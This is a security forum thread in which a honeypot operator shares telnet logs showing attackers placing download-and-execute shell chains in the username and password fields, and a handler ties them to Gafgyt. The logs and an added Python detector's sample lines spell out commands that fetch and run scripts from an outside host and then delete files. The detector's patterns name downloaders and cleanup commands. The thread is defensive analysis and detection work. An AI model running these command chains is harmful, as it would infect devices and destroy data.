
SANS ISC: New telnet attack? command injection against telnet... - SANS Internet Storm Center SANS ISC InfoSec Forums


New telnet attack? command injection against telnet...
Starting last night (Aug 23) I've seen a brand new style of attacks against my telnet honeypots. It appears that they are sending commands as the username and/or the password. I assume there's some new vulnerability where somebody's telnetd will actually run these commands.

Anybody have a clue?

Sample logs follow:

2016-08-23T22:22:43.301154-04:00 erhp2 ptelnetd[539]: IP: ###.#.137.70 TelnetLog: Username: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://##.###.2.94/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp ##.##.2.94 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g ##.###.2.94; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ##.###.2.94 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf * Password: �

2016-08-24T02:32:58.166913-04:00 erhp2 ptelnetd[3966]: IP: ##.##.121.102 TelnetLog: Username: sh Password: cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://##.##.172.238/bin.sh;sh bin.sh;busybox tftp -r bin2.sh -g ##.##.172.238;sh bin2.sh;busybox tftp ##.##.172.238 -c get bin3.sh;sh bin3.sh;busybox ftpget ##.##.172.238 bin4.sh bin4.sh;sh bin4.sh;exit

>>Ericw
EricWedaa

4 Posts
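The two honeypot lines above share one shape: a `TelnetLog: Username: ... Password: ...` record where one credential field carries a chained shell command (directory hop, downloader, `chmod 777`, `sh *.sh`, cleanup). The following detector, an added example that is not part of the original post, parses that record format and flags a field as command injection when several of those indicator types appear together; the sample log lines, IPs and hostname in it are constructed placeholders, not the poster's data.

```python
import re

# Field layout of the ptelnetd lines quoted in the thread:
#   "... IP: <ip> TelnetLog: Username: <user> Password: <pass>"
# Username is everything between the two labels; password runs to end of line.
LOG_RE = re.compile(
    r"IP:\s*(?P<ip>\S+)\s+TelnetLog:\s*Username:\s*(?P<user>.*?)\s*Password:\s*(?P<pw>.*)$"
)

# Indicator types seen in the injected credentials. None belongs in a real login;
# two or more distinct types in one field is treated as injection.
INDICATORS = {
    "shell_chain": re.compile(r"(\|\||&&|;)"),                       # command chaining
    "dir_hop": re.compile(r"\bcd\s+/(tmp|var/run|dev/shm|mnt|root|var)\b"),
    "downloader": re.compile(r"\b(wget|tftp|ftpget|curl|busybox)\b"),
    "exec_script": re.compile(r"\b(sh|chmod\s+777)\s+\S+\.sh\b"),   # run fetched script
    "cleanup": re.compile(r"\brm\s+-r?f\b"),                        # delete traces
}

def parse_telnet_log(line):
    """Return (ip, username, password) from a TelnetLog line, or None if it is not one."""
    m = LOG_RE.search(line)
    return (m.group("ip"), m.group("user"), m.group("pw")) if m else None

def credential_indicators(value):
    """Sorted names of the indicator types matched by one credential field."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(value))

def classify(line, threshold=2):
    """Label one log line: which fields carry an injected command, and a verdict."""
    parsed = parse_telnet_log(line)
    if parsed is None:
        return None
    ip, user, pw = parsed
    hits = {"username": credential_indicators(user), "password": credential_indicators(pw)}
    injected = [field for field, found in hits.items() if len(found) >= threshold]
    verdict = "command_injection" if injected else "credential_attempt"
    return {"ip": ip, "hits": hits, "injected_fields": injected, "verdict": verdict}

# Constructed sample lines (placeholder IPs/host; mirrors the thread's two patterns plus a benign login).
SAMPLE_LOGS = [
    "2016-08-23T22:22:43-04:00 hp ptelnetd[1]: IP: 198.51.100.7 TelnetLog: Username: cd /tmp || cd /var/run || cd /; wget http://198.51.100.9/bins.sh; chmod 777 bins.sh; sh bins.sh; rm -rf bins.sh Password: x",
    "2016-08-24T02:32:58-04:00 hp ptelnetd[2]: IP: 198.51.100.8 TelnetLog: Username: sh Password: cd /tmp || cd /dev/shm;rm -f *;busybox wget http://198.51.100.9/bin.sh;sh bin.sh;exit",
    "2016-08-24T03:00:00-04:00 hp ptelnetd[3]: IP: 198.51.100.10 TelnetLog: Username: admin Password: admin",
]

if __name__ == "__main__":
    for entry in SAMPLE_LOGS:
        print(classify(entry))
```

Running it over a real honeypot log (one `classify` per line) separates the dictionary-style logins from the injected command strings, which is the distinction the thread is trying to make.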
Hello Eric,

Could be a buggy bot script?
The set of commands sent as username is coming from the classic Gafgyt malware…
Could you share the IP addresses with me please?

KR,
Xme

305 Posts
ISC Handler
I don't think so. That malware apparently tries a dictionary attack and if it succeeds THEN it sends commands. At least according to what little I could find. Do you have a decent writeup someplace?

EricWedaa

4 Posts
